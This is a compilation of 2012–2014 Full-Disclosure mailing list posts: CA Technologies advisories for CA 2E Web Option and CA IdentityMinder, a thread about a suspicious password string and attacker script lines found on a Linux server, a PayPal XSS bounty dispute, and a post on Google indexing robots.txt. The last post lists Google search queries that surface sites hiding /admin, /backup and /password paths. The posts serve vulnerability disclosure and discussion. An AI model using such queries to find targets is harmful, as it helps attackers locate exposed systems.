[Full-disclosure] CA20140218-01: Security Notice for CA 2E Web Option

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20140218-01: Security Notice for CA 2E Web Option

Issued: February 18, 2014

CA Technologies Support is alerting customers to a potential risk in 
CA 2E Web Option (C2WEB).  A vulnerability exists that can allow an 
attacker to exploit an authentication weakness and execute a session 
prediction attack.  The vulnerability, CVE-2014-1219, is due to a 
predictable session token.  An unauthenticated attacker can manipulate 
a session token to gain privileged access to a valid session.  CA 
Technologies has issued fixes to address the vulnerability.

Risk Rating

High

Affected Platforms

IBM i

Affected Products

CA 2E Web Option r8.5
CA 2E Web Option r8.5 + PTF 1
CA 2E Web Option r8.6
CA 2E Web Option r8.6 + PTF B

Note that the vulnerable version reported by Portcullis, r8.1.2, 
reached End of Service (EOS) on April 10, 2013 and is no longer 
supported.  Customers can find the CA 2E r8.1, r8.1 SP1 and r8.1 SP2
End of Service Announcement, dated April 10, 2012, on the CA Support 
website.

Non-Affected Products

None (i.e. all supported versions of CA 2E Web Option are affected)

How to determine if the installation is affected

All supported versions of CA 2E Web Option are affected by this 
vulnerability.

To determine if the fix for this vulnerability has been applied, refer 
to the guidance below for each supported version.

CA 2E Web Option r8.5:
The existence of the data area YHFM55861 in PTF library YW8501254 will 
indicate that this solution has been applied.

CA 2E Web Option r8.6:
The existence of the data area YHFM55865 in PTF library YW860B254 will 
indicate that this solution has been applied.

Solution

CA Technologies has issued the following fixes to address the 
vulnerability.

CA 2E Web Option r8.5:
RO67583

CA 2E Web Option r8.6:
RO67569

Workaround

None

References

CVE-2014-1219 - CA 2E Web Option Session Prediction Vulnerability

CA20140218-01: Security Notice for CA 2E Web Option
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg

Acknowledgement

CVE-2014-1219 - Portcullis

Change History

Version 1.0: Initial Release

If additional information is required, please contact CA Technologies 
Support at https://support.ca.com/.

If you discover a vulnerability in CA Technologies products, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams
CA Technologies
Director, Product Vulnerability Response Team
ken.willi...@ca.com


Copyright © 2014 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 
11749. All other trademarks, trade names, service marks, and logos 
referenced herein belong to their respective companies.

-BEGIN PGP SIGNATURE-
Version: Encryption Desktop 10.3.2 (Build 15238)
Charset: utf-8

wj8DBQFTA9mXeSWR3+KUGYURAkNJAJ9AuzNLh8ZUGQuwwHVlGvBO9QfQ6ACeO8xG
bFkm420IatsvgNIBBPmUhpg=
=Hgof
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] CVE-2014-1219 - Unauthenticated Privilege Escalation in CA 2E Web Option

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

> Date: Wed, 12 Feb 2014 15:59:34 -
> From: "Portcullis Advisories" 
[snip]
> Vulnerability title: Unauthenticated Privilege Escalation in CA 
> 2E Web Option
>
> CVE: CVE-2014-1219
> Vendor: CA
> Product: 2E Web Option
> Affected version: 8.1.2
[snip]   


CA Technologies is currently investigating a vulnerability report 
concerning CA 2E Web Option that was published publicly on 2014-02-11 
(CVE-2014-1219).

This statement can be found at 
http://blogs.ca.com/securityresponse/2014/02/13/

Note that r8.1.2 reached End of Service (EOS) on April 10, 2013 and is 
no longer supported.  Customers can find the End of Service Announcement, 
dated April 10, 2012, on the CA Support website.
https://support.ca.com/

Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
ken.willi...@ca.com


Copyright (C) 2014 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 
11749. All other trademarks, trade names, service marks, and logos 
referenced herein belong to their respective companies.

-BEGIN PGP SIGNATURE-
Version: Encryption Desktop 10.3.1 (Build 13100)
Charset: utf-8

wj8DBQFS/QaPeSWR3+KUGYURApj7AKCX/WOzON/8X9BgbQk4Siz/bDtGBQCeIO8S
VrgYM0oZD2rTLdIN0aje5to=
=AjzU
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Romanian hacker unknown string

[James Condron]

It could mean anything. I'm just asking how you got that string. Hell, the
string of numbers '199403' could be there because in the 1994 world cup
Romania got to the 3rd to last game from the World Cup Final. Given enough
random chars in a random file you could probably get lots of allusions to
Romania. Given a string in a passwd file somewhere it could be less likely
to be a coincidence.


On Fri, Jan 17, 2014 at 12:01 PM, Asheesh Tripathi <
informationhacke...@gmail.com> wrote:

> yes chances are their , if we search last 8 alphabet in search engine the
> result will come as "*szrtech1* is a Registered user in the Romanian
> Security Team" , it might be a coincidence
>
>
> On Fri, Jan 17, 2014 at 5:19 PM, James Condron  > wrote:
>
>> How are you capturing this password? Chances are its just a random string
>> they're using
>>
>>
>> On Fri, Jan 17, 2014 at 11:37 AM, Asheesh Tripathi <
>> informationhacke...@gmail.com> wrote:
>>
>>> Yes Tried to reset password of one user account with this string
>>>
>>>
>>> On Fri, Jan 17, 2014 at 4:57 PM, James Condron <
>>> ja...@zero-internet.org.uk> wrote:
>>>
>>>> Okay, thats fair enough but where was that string? What makes you think
>>>> it means anything? You said something about it being a password, did you
>>>> not?
>>>>
>>>>
>>>> On Fri, Jan 17, 2014 at 11:21 AM, Asheesh Tripathi <
>>>> informationhacke...@gmail.com> wrote:
>>>>
>>>>> There was many scripts in which it contains an URL to a Romanian
>>>>> hacking forum
>>>>> printf "for any info vizit http://hacking.3xforum.ro/ \n";
>>>>> printf "daca nu pica in 10 min dai pe alt port \n";
>>>>>
>>>>> I am looking for  what does this string mean
>>>>> "rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1"
>>>>>
>>>>>
>>>>>
>>>>>
>>>>> On Fri, Jan 17, 2014 at 4:08 PM, James Condron <
>>>>> ja...@zero-internet.org.uk> wrote:
>>>>>
>>>>>> Where was it? And how do you know 'Romanian hackers' have been near
>>>>>> your server?
>>>>>>
>>>>>> -James
>>>>>>
>>>>>>
>>>>>> On Fri, Jan 17, 2014 at 10:19 AM, Asheesh Tripathi <
>>>>>> informationhacke...@gmail.com> wrote:
>>>>>>
>>>>>>>
>>>>>>> Hi All
>>>>>>>
>>>>>>> During log analysis of Linux server we have found a  strings
>>>>>>> passwd
>>>>>>>
>>>>>>> rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1
>>>>>>>
>>>>>>> Can anybody help me out in understanding  above string we have
>>>>>>> already found some traces of  Romanian hackers
>>>>>>>
>>>>>>> Thanks
>>>>>>> Anaconda
>>>>>>>
>>>>>>> ___
>>>>>>> Full-Disclosure - We believe in it.
>>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>
>>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Romanian hacker unknown string

[James Condron]

How are you capturing this password? Chances are its just a random string
they're using


On Fri, Jan 17, 2014 at 11:37 AM, Asheesh Tripathi <
informationhacke...@gmail.com> wrote:

> Yes Tried to reset password of one user account with this string
>
>
> On Fri, Jan 17, 2014 at 4:57 PM, James Condron  > wrote:
>
>> Okay, thats fair enough but where was that string? What makes you think
>> it means anything? You said something about it being a password, did you
>> not?
>>
>>
>> On Fri, Jan 17, 2014 at 11:21 AM, Asheesh Tripathi <
>> informationhacke...@gmail.com> wrote:
>>
>>> There was many scripts in which it contains an URL to a Romanian hacking
>>> forum
>>> printf "for any info vizit http://hacking.3xforum.ro/ \n";
>>> printf "daca nu pica in 10 min dai pe alt port \n";
>>>
>>> I am looking for  what does this string mean
>>> "rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1"
>>>
>>>
>>>
>>>
>>> On Fri, Jan 17, 2014 at 4:08 PM, James Condron <
>>> ja...@zero-internet.org.uk> wrote:
>>>
>>>> Where was it? And how do you know 'Romanian hackers' have been near
>>>> your server?
>>>>
>>>> -James
>>>>
>>>>
>>>> On Fri, Jan 17, 2014 at 10:19 AM, Asheesh Tripathi <
>>>> informationhacke...@gmail.com> wrote:
>>>>
>>>>>
>>>>> Hi All
>>>>>
>>>>> During log analysis of Linux server we have found a  strings
>>>>> passwd
>>>>>
>>>>> rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1
>>>>>
>>>>> Can anybody help me out in understanding  above string we have already
>>>>> found some traces of  Romanian hackers
>>>>>
>>>>> Thanks
>>>>> Anaconda
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>
>>>>
>>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Romanian hacker unknown string

[James Condron]

Okay, thats fair enough but where was that string? What makes you think it
means anything? You said something about it being a password, did you not?


On Fri, Jan 17, 2014 at 11:21 AM, Asheesh Tripathi <
informationhacke...@gmail.com> wrote:

> There was many scripts in which it contains an URL to a Romanian hacking
> forum
> printf "for any info vizit http://hacking.3xforum.ro/ \n";
> printf "daca nu pica in 10 min dai pe alt port \n";
>
> I am looking for  what does this string mean
> "rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1"
>
>
>
>
> On Fri, Jan 17, 2014 at 4:08 PM, James Condron  > wrote:
>
>> Where was it? And how do you know 'Romanian hackers' have been near your
>> server?
>>
>> -James
>>
>>
>> On Fri, Jan 17, 2014 at 10:19 AM, Asheesh Tripathi <
>> informationhacke...@gmail.com> wrote:
>>
>>>
>>> Hi All
>>>
>>> During log analysis of Linux server we have found a  strings
>>> passwd
>>> rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1
>>>
>>> Can anybody help me out in understanding  above string we have already
>>> found some traces of  Romanian hackers
>>>
>>> Thanks
>>> Anaconda
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Romanian hacker unknown string

[James Condron]

Where was it? And how do you know 'Romanian hackers' have been near your
server?

-James


On Fri, Jan 17, 2014 at 10:19 AM, Asheesh Tripathi <
informationhacke...@gmail.com> wrote:

>
> Hi All
>
> During log analysis of Linux server we have found a  strings
> passwd
> rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1
>
> Can anybody help me out in understanding  above string we have already
> found some traces of  Romanian hackers
>
> Thanks
> Anaconda
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PayPal.com XSS Vulnerability

[James Condron]

Hrm,

I read it that the issue was still the age but that the previous disclosure was 
another reason they had found. Its sneaky and poor but I didn't read it as a 
change in reason; just an additional thing they found. It may even be true.

The fact is they handled this poorly but whether they're lying about another 
person finding it or not had they been cleverly dishonest they would have gone 
with that in the first place.

They ought really pay, though.

On 29 May 2013, at 14:51, Jeffrey Walton  wrote:

> Hi James,
> 
>> I guess the email from ebay sorta makes it all moot anyway.
> Its interesting how the reason code changed. On May 24 the reason was
> Kugler was too young; and then on May 29 the reason was the flaw was
> previously reported.
> 
> It sounds like PayPal is lying to bring this to an end; and they've
> lost more credibility.
> 
> Jeff
> 
> On Wed, May 29, 2013 at 9:22 AM, James Condron
>  wrote:
>> Ah, but then don't forget that in a contract (which this most certainly is 
>> not- but the parallels are there) ambiguity benefits the party which didn't 
>> draft the document.
>> 
>> If its reasonable to infer a payment, and reasonable to fail to infer an age 
>> range, I think its reasonable to get paid for it.
>> 
>> I guess the email from ebay sorta makes it all moot anyway.
>> 
>> On 29 May 2013, at 13:33, Julius Kivimäki  wrote:
>> 
>>> Well, they don't exactly state that they're going to pay you either.
>>> 
>>> 
>>> 2013/5/29 Źmicier Januszkiewicz 
>>> 
>>>> Hmm, interesting.
>>>> 
>>>> For some reason I fail to find the mentioned "age requirements" at the
>>>> official bug bounty page located at
>>>> https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues
>>>> Am I looking in the wrong direction? Can someone please point to where
>>>> this is written?
>>>> 
>>>> With kind regards,
>>>> Z.
>>>> 
>>>> 
>>>> 2013/5/29 Robert Kugler 
>>>> 
>>>>> 
>>>>> 
>>>>> 
>>>>> 2013/5/29 Jeffrey Walton 
>>>>> 
>>>>>> On Fri, May 24, 2013 at 12:38 PM, Robert Kugler
>>>>>>  wrote:
>>>>>>> Hello all!
>>>>>>> 
>>>>>>> I'm Robert Kugler a 17 years old German student who's interested in
>>>>>> securing
>>>>>>> computer systems.
>>>>>>> 
>>>>>>> I would like to warn you that PayPal.com is vulnerable to a Cross-Site
>>>>>>> Scripting vulnerability!
>>>>>>> PayPal Inc. is running a bug bounty program for professional security
>>>>>>> researchers.
>>>>>>> 
>>>>>>> ...
>>>>>>> Unfortunately PayPal disqualified me from receiving any bounty payment
>>>>>>> because of being 17 years old...
>>>>>>> 
>>>>>>> ...
>>>>>>> I don’t want to allege PayPal a kind of bug bounty cost saving, but
>>>>>> it’s not
>>>>>>> the best idea when you're interested in motivated security
>>>>>> researchers...
>>>>>> Fortunately Microsoft and Firefox took a more reasonable positions for
>>>>>> the bugs you discovered with their products.
>>>>>> 
>>>>>> PCWorld and MSN picked up the story:
>>>>>> 
>>>>>> http://www.pcworld.com/article/2039940/paypal-denies-teenager-reward-for-finding-website-bug.html
>>>>>> and
>>>>>> http://now.msn.com/paypal-denies-reward-to-robert-kugler-teen-who-found-bug-in-code
>>>>>> .
>>>>>> It is now news worthy to Wikipedia, where it will live forever under
>>>>>> Criticisms (unfortunately, it appears PayPal does a lot of
>>>>>> questionable things so its just one of a long list).
>>>>>> 
>>>>>> Jeff
>>>>>> 
>>>>> 
>>>>> Today I received an email from PayPal Site Security:
>>>>> 
>>>>> "Hi Robert,
>>>>> 
>>>>> We appreciate your research efforts and we are sorry that our
>>>>> age requirements restrict you from participating in our Bug Bounty 
>>>>> Program.
>>>>> With regards to your specific bug su

Re: [Full-disclosure] PayPal.com XSS Vulnerability

[James Condron]

Ah, but then don't forget that in a contract (which this most certainly is not- 
but the parallels are there) ambiguity benefits the party which didn't draft 
the document.

If its reasonable to infer a payment, and reasonable to fail to infer an age 
range, I think its reasonable to get paid for it.

I guess the email from ebay sorta makes it all moot anyway.

On 29 May 2013, at 13:33, Julius Kivimäki  wrote:

> Well, they don't exactly state that they're going to pay you either.
> 
> 
> 2013/5/29 Źmicier Januszkiewicz 
> 
>> Hmm, interesting.
>> 
>> For some reason I fail to find the mentioned "age requirements" at the
>> official bug bounty page located at
>> https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues
>> Am I looking in the wrong direction? Can someone please point to where
>> this is written?
>> 
>> With kind regards,
>> Z.
>> 
>> 
>> 2013/5/29 Robert Kugler 
>> 
>>> 
>>> 
>>> 
>>> 2013/5/29 Jeffrey Walton 
>>> 
 On Fri, May 24, 2013 at 12:38 PM, Robert Kugler
  wrote:
> Hello all!
> 
> I'm Robert Kugler a 17 years old German student who's interested in
 securing
> computer systems.
> 
> I would like to warn you that PayPal.com is vulnerable to a Cross-Site
> Scripting vulnerability!
> PayPal Inc. is running a bug bounty program for professional security
> researchers.
> 
> ...
> Unfortunately PayPal disqualified me from receiving any bounty payment
> because of being 17 years old...
> 
> ...
> I don’t want to allege PayPal a kind of bug bounty cost saving, but
 it’s not
> the best idea when you're interested in motivated security
 researchers...
 Fortunately Microsoft and Firefox took a more reasonable positions for
 the bugs you discovered with their products.
 
 PCWorld and MSN picked up the story:
 
 http://www.pcworld.com/article/2039940/paypal-denies-teenager-reward-for-finding-website-bug.html
 and
 http://now.msn.com/paypal-denies-reward-to-robert-kugler-teen-who-found-bug-in-code
 .
 It is now news worthy to Wikipedia, where it will live forever under
 Criticisms (unfortunately, it appears PayPal does a lot of
 questionable things so its just one of a long list).
 
 Jeff
 
>>> 
>>> Today I received an email from PayPal Site Security:
>>> 
>>> "Hi Robert,
>>> 
>>> We appreciate your research efforts and we are sorry that our
>>> age requirements restrict you from participating in our Bug Bounty Program.
>>> With regards to your specific bug submission, we should have also mentioned
>>> that the vulnerability you submitted was previously reported by another
>>> researcher and we are already actively fixing the issue. We hope that you
>>> understand that bugs that have previously been reported to us are not
>>> eligible for payment as we must honor the original researcher that provided
>>> the vulnerability.
>>> 
>>> I would also mention that in general, PayPal has been a consistent
>>> supporter of what is known as “responsible disclosure”.  That is, ensuring
>>> that a company has a reasonable amount of time to fix a bug from
>>> notification to public disclosure.  This allows the company to fix the bug,
>>> so that criminals cannot use that knowledge to exploit it, but still gives
>>> the researchers the ability to draw attention to their skills and
>>> experience.  When researchers go down the “full disclosure” path, it then
>>> puts us in a race with criminals who may successfully use the vulnerability
>>> you found to victimize our customers.  We do not support the full
>>> disclosure methodology, precisely because it puts real people at
>>> unnecessary risk. We hope you keep that in mind when doing future research.
>>> 
>>> We acknowledge that PayPal can do more to recognize younger security
>>> researchers around the world. As a first step, we would like you to be the
>>> first security researcher in the history of our program to receive an
>>> official "Letter of Recognition" from our Chief Information Security
>>> Officer Michael Barrett (attached, will follow up with a signed copy
>>> tomorrow). We truly appreciate your contribution to helping keep PayPal
>>> secure for our customers and we will continue to explore other ways that we
>>> can we provide alternate recognition for younger researchers.
>>> 
>>> We'd welcome the chance to explain this all to you first hand over the
>>> phone, please email us at this address with a number and good time to reach
>>> you and we’d be happy to follow-up.
>>> 
>>> Thank you,
>>> PayPal Site Security"
>>> 
>>> It's still curious that they only mentioned the first researcher who
>>> previously found the bug after all the media attention...Nevertheless I
>>> appreciate their intentions to acknowledge also younger security
>>> researchers, it's a step in the right direction!!
>>> 
>>> Best regards,
>>> 
>>> Robert Kugler
>>> 
>>> __

[Full-disclosure] CA20121220-01: Security Notice for CA IdentityMinder [updated]

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20121220-01: Security Notice for CA IdentityMinder

Issued: December 20, 2012
Updated: January 18, 2013


CA Technologies Support is alerting customers to two potential risks in CA 
IdentityMinder (formerly known as CA Identity Manager).  Two 
vulnerabilities exist that can allow a remote attacker to execute 
arbitrary commands, manipulate data, or gain elevated access.  CA 
Technologies has issued patches to address the vulnerabilities.

The first vulnerability, CVE-2012-6298, allows a remote attacker to execute
arbitrary commands or manipulate data.

The second vulnerability, CVE-2012-6299, allows a remote attacker to gain 
elevated access.


Risk Rating

High


Affected Platforms

All


Affected Products

CA IdentityMinder r12.0 CR16 and earlier
CA IdentityMinder r12.5 SP1 thru SP14
CA IdentityMinder r12.6 GA


Non-Affected Products

None (i.e. all supported versions of CA IdentityMinder are vulnerable)


How to determine if the installation is affected

All versions of CA IdentityMinder r12.0, r12.5 prior to SP15, and r12.6 GA 
are vulnerable.

You can confirm that patches have been successfully applied by checking the
dates associated with the following IdentityMinder jar files (the jar files
are created in the patch output sub-folder structure in the root folder 
from which you have run the patch utility):

CA IdentityMinder r12.0 CR16 and earlier – user_console.jar
CA IdentityMinder r12.5 SP1 thru SP6 – user_console.jar
CA IdentityMinder r12.5 SP7 thru SP14 – user_console.jar & imsapi6.jar
CA IdentityMinder r12.6 GA –  user_console.jar & imsapi6.jar

The dates on these jar files will be set to the date on which the patch was
applied.


Solution

CA Technologies has issued the following patches to address the 
vulnerabilities.  Download the appropriate patch(es) and follow the 
instructions in the readme.txt file.  These patches can be applied to all 
operating system platforms.

12.0CR8+ - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/120CR8+.zip

12.5SP1 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP1.zip

12.5SP2 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP2.zip

12.5SP3 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP3.zip

12.5SP4 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP4.zip

12.5SP5 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP5.zip

12.5SP6 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP6.zip

12.5SP7 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP7.zip

12.5SP8 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP8.zip

12.5SP9 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP9.zip

12.5SP10 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP10.zip

12.5SP11 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP11.zip

12.5SP12 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP12.zip

12.5SP13 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP13.zip

12.5SP14 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP14.zip

12.6SP0 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/126GA.zip


Workaround

None


References

CVE-2012-6298 - CA IdentityMinder execute arbitrary commands or manipulate
data
CVE-2012-6299 - CA IdentityMinder gain elevated access

CA20121220-01: Security Notice for CA IdentityMinder
(URL may wrap)
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={FBA53B
61-3A68-4506-9876-F845F6DD8A93}


Acknowledgement

CVE-2012-6298 - Discovered internally by CA Technologies 
CVE-2012-6299 - Discovered internally by CA Technologies


Change History

Version 1.0: Initial Release

Version 1.1: Revised the section entitled "How to determine if the 
installation is affected".


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com/

If you discover a vulnerability in CA Technologies products, please report 
your findings to the CA Technologies Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782

CA Technologies Security Notices
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg


Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilj...@ca.com


Copyright (C) 2013 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 
11749. All other trademarks, trade names, service marks, and logos 
referenced herein belong to their respective companies.

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj8DBQFQ+dCzeSWR3+KUGYURAnGbAJ9yscNDhny2rCY2X4qS6g/YtOtM6QCffyTw
tZL1z2lAQhkrxdDNzN9tyzs=
=rNug
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA20121220-01: Security Notice for CA IdentityMinder

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20121220-01: Security Notice for CA IdentityMinder

Issued: December 20, 2012


CA Technologies Support is alerting customers to two potential risks in CA 
IdentityMinder (formerly known as CA Identity Manager).  Two 
vulnerabilities exist that can allow a remote attacker to execute arbitrary
commands, manipulate data, or gain elevated access.  CA Technologies has 
issued patches to address the vulnerability.

The first vulnerability, CVE-2012-6298, allows a remote attacker to execute
arbitrary commands or manipulate data.

The second vulnerability, CVE-2012-6299, allows a remote attacker to gain 
elevated access.


Risk Rating

High


Affected Platforms

All


Affected Products

CA IdentityMinder r12.0 CR16 and earlier
CA IdentityMinder r12.5 SP1 thru SP14
CA IdentityMinder r12.6 GA


Non-Affected Products

None (i.e. all supported versions of CA IdentityMinder are vulnerable)


How to determine if the installation is affected

All versions of CA IdentityMinder r12.0, r12.5 prior to SP15, and r12.6 GA 
are vulnerable.

You can confirm that patches have been successfully applied by checking the
dates associated with the following IdentityMinder jar files: imsapi6.jar 
and ims.jar.  The dates on these jars will be set to the dates on which the
patch was applied.


Solution

CA Technologies has issued the following patches to address the 
vulnerabilities.  Download the appropriate patch(es) and follow the 
instructions in the readme.txt file.  These patches can be applied to all 
operating system platforms.

12.0CR8+ - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/120CR8+.zip

12.5SP1 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP1.zip

12.5SP2 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP2.zip

12.5SP3 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP3.zip

12.5SP4 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP4.zip

12.5SP5 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP5.zip

12.5SP6 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP6.zip

12.5SP7 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP7.zip

12.5SP8 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP8.zip

12.5SP9 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP9.zip

12.5SP10 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP10.zip

12.5SP11 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP11.zip

12.5SP12 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP12.zip

12.5SP13 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP13.zip

12.5SP14 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP14.zip

12.6SP0 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/126GA.zip



Workaround

None


References

CVE-2012-6298 - CA IdentityMinder execute arbitrary commands or manipulate
data
CVE-2012-6299 - CA IdentityMinder gain elevated access

CA20121220-01: Security Notice for CA IdentityMinder
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={FBA53B
61-3A68-4506-9876-F845F6DD8A93}


Acknowledgement

CVE-2012-6298 - Discovered internally by CA Technologies 
CVE-2012-6299 - Discovered internally by CA Technologies


Change History

Version 1.0: Initial Release


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com/

If you discover a vulnerability in CA Technologies products, please report 
your findings to the CA Technologies Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilj...@ca.com


Copyright (C) 2012 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 
11749. All other trademarks, trade names, service marks, and logos 
referenced herein belong to their respective companies.


-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj8DBQFQ04dQeSWR3+KUGYURAoIZAJ9QibJh7LUweVUQzvBstoWWeDV5eQCfSG1A
YK0Og3SiMtIHOoA6JWE1vTA=
=Wlax
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google's robots.txt handling

[James Lay]

On 2012-12-10 12:25, Hurgel Bumpf wrote:
> Hi list,
>
>
> i tried to contact google, but as they didn't answer my email,  i do
> forward this to FD.
> This "security" feature is not cleary a google vulnerability, but
> exposes websites informations that are not really intended to be
> public.
>
> (Additionally i have to say that i advocate robots.txt files without
> sensitive content and working security mechanisms.)
>
> Here is an example:
>
> An admin has a public webservice running with folders containing
> sensitive informations. Enter these folders in his robots.txt and
> "protect" them from the indexing process of spiders. As he doesn't
> want the /admin/ gui to appear in the search results he also puts his
> /admin in the robots text and finaly makes a backup to the folder
> /backup.
>
> Nevertheless these folders arent browsable but they might contain
> f(a)iles with easy to guess namestructures, non-encrypted
> authentications (simple AUTH) , you name it...
>
> Without a robots.txt nobody would know about the existance of these
> folders, but as some folders might be linked somewhere, these folders
> might appear in search results when not defined in the robots.txt  
> The
> admin finds himself in a catch-22 situation where he seems to prefer
> the robots.txt file.
>
> Long story short.
>
> Although google accepts and respects the directives of the robots.txt
> file, google INDEXES these files.
>
> This my concern.
>
> 
> http://www.google.com/search?q=inurl:robots.txt+filetype%3Atxt+Disallow%3A+%2Fadmin
> 
> http://www.google.com/search?q=inurl:robots.txt+filetype%3Atxt+Disallow%3A+%2Fbackup
> 
> http://www.google.com/search?q=inurl:robots.txt+filetype%3Atxt+Disallow%3A+%2Fpassword
>
> As these searches can be used less for targeted attacks, they more
> can be used to find victims.
>
> 
> http://www.google.com/search?q=inurl:robots.txt+filetype%3Atxt+%2FDisallow%3A+wp-admin
> 
